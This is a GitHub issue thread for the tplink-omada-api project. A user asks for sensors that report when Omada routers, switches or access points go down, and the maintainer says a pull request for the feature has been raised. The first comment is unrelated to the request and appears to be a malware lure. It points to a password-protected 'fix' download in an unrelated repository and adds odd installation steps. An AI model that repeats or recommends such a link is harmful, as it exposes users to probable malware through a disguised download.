### ISSUE TITLE
Suggestion - Add sensors to know what hardware is up or down

### ISSUE THREAD

**Issue by jo-vini** [MarkGodwin/tplink-omada-api#55]
Currently the interface can see ports and clients but not if the switch is up or down or router or controller or APs.

I run a VPN across 2 sites, each have Omada under 1 controller.  VPN connection to the remote controller but I can only view the devices at 1 location.  1 Site has 2 APs and 1 Router.  The other site has 1 Router, 3 switches, 5 APs.  I had an AP go down the other day but didn't know it until I stumbled on it.  Setting up an automation to send a notice out would help with management.

**Comment by dionathanfreitas** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MarkGodwin** [comment]
This is the next thing on my list of features to add to the Hass integration. I have a PR in for the ground-work behind this. Once that is merged, I should be able to add the device status sensors fairly soon.

**Comment by MarkGodwin** [comment]
A PR for this was raised today in HA.
